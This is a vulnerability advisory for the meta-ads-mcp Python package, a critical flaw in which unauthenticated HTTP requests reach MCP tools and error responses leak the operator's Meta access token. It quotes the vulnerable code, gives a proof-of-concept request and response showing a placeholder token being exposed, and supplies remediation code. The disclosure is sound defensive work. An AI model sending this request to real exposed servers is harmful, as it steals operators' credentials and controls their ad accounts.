PT-2026-48687 · Pypi · Meta-Ads-Mcp

Published

2026-06-11

·

Updated

2026-06-11

·

CVE-2026-48039

CVSS v3.1

9.1

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Unauthenticated HTTP MCP Tool Execution Leaks Operator Meta Access Token

FieldValue
Repositorypipeboard-co/meta-ads-mcp
Affected version≤ 1.0.101 (commit 496c988 ~ 7d14226); Versions 1.0.102–1.0.105 lack git tags, so patch status is unconfirmed.
VulnerabilityCWE-287 — Improper Authentication
SeverityCritical
CVSS 3.19.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)

Summary

AuthInjectionMiddleware.dispatch() at http auth integration.py:272 unconditionally forwards unauthenticated Streamable HTTP requests to downstream MCP tool handlers without issuing a 401 response, allowing any network-reachable caller to invoke MCP tools without authentication. When no per-request credential is present, tool handlers fall back to the META ACCESS TOKEN environment variable, and when the downstream Meta Graph API call fails, api.py:263–269 serialises the raw httpx request URL—including the operator's access token as a query parameter—into the JSON-RPC response body, delivering the credential to the unauthenticated caller.

Affected Code

meta ads mcp/core/http auth integration.py:272 — middleware unconditionally calls call next(request) even when no auth headers are present
    if not auth token and not pipeboard token:
      logger.warning("HTTP Auth Middleware: No authentication tokens found in headers")

    try:
      response = await call next(request)  # line 272: no 401 returned
      return response
    finally:
      if auth token:
        FastMCPAuthIntegration.clear auth token()
      if pipeboard token:
        FastMCPAuthIntegration.clear pipeboard token()
meta ads mcp/core/api.py:136 — operator token appended to URL query parameters, exposed verbatim in Graph API error response request url
  request params = params or {}
  request params["access token"] = access token
Unauthenticated HTTP POST /mcp → AuthInjectionMiddleware.dispatch():272 (no 401 returned) → tool handler invokes make api request() using META ACCESS TOKEN env fallback → request params["access token"]:136 (token in URL) → Graph API error path at api.py:263–269 returns request url containing access token=… in 200 OK JSON-RPC response.

Proof of Concept

Step 1 — POST /mcp with no auth headers: HTTP 200 OK with operator access token in request url — proves unauthenticated tool execution and operator credential leakage.
docker run --rm -p 127.0.0.1:8080:8080 -e META ACCESS TOKEN=FAKE TOKEN FOR POC DEMO 123456789 meta-ads-mcp-vuln001 &
python3 poc.py
POST /mcp HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/json
Accept: application/json, text/event-stream

{"jsonrpc":"2.0","method":"tools/call","id":2,"params":{"name":"get ad accounts","arguments":{"limit":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{
 "jsonrpc": "2.0",
 "id": 2,
 "result": {
  "content": [
   {
    "type": "text",
    "text": "{"data": "{
 "error": {
  "message": "HTTP Error: 400",
  "details": {
   "error": {
    "message": "Invalid OAuth access token data.",
    "type": "OAuthException",
    "code": 190
   }
  },
  "full response": {
   "status code": 400,
   "url": "https://graph.facebook.com/v24.0/me/adaccounts?...&access token=FAKE TOKEN FOR POC DEMO 123456789",
   "request url": "https://graph.facebook.com/v24.0/me/adaccounts?fields=id%2Cname%2Caccount id%2Caccount status%2Camount spent%2Cbalance%2Ccurrency%2Cage%2Cbusiness city%2Cbusiness country code&limit=1&access token=FAKE TOKEN FOR POC DEMO 123456789"
  }
 }
}"}"
   }
  ],
  "isError": false
 }
}

Impact

An unauthenticated attacker who can reach the MCP server's HTTP port (default 8080) can invoke any registered MCP tool as the operator, consuming the operator's Meta Ads API quota and performing read or write operations on connected Meta ad accounts. When any tool call triggers a Graph API error, the operator's META ACCESS TOKEN is returned verbatim in the request url field of the 200 OK JSON-RPC response, enabling the attacker to exfiltrate the long-lived credential and subsequently access the Meta Graph API directly outside the MCP interface.

Remediation

In AuthInjectionMiddleware.dispatch() (http auth integration.py), return a 401 Unauthorized response when neither auth token nor pipeboard token is present, instead of falling through to call next:
from starlette.responses import Response

if not auth token and not pipeboard token:
  return Response(
    content='{"error":"Unauthorized"}',
    status code=401,
    media type="application/json",
  )
In make api request() (api.py), strip access token from the request url in error payloads, or transmit the token via an Authorization: Bearer header rather than a URL query parameter to prevent it from appearing in URLs, server logs, or error responses.

Fix

Improper Authentication

Generation of Error Message Containing Sensitive Information

Insufficiently Protected Credentials

Weakness Enumeration

CWE-287CWE-209CWE-522

Related Identifiers

CVE-2026-48039
GHSA-9GW6-46QC-99VR

Affected Products

Meta-Ads-Mcp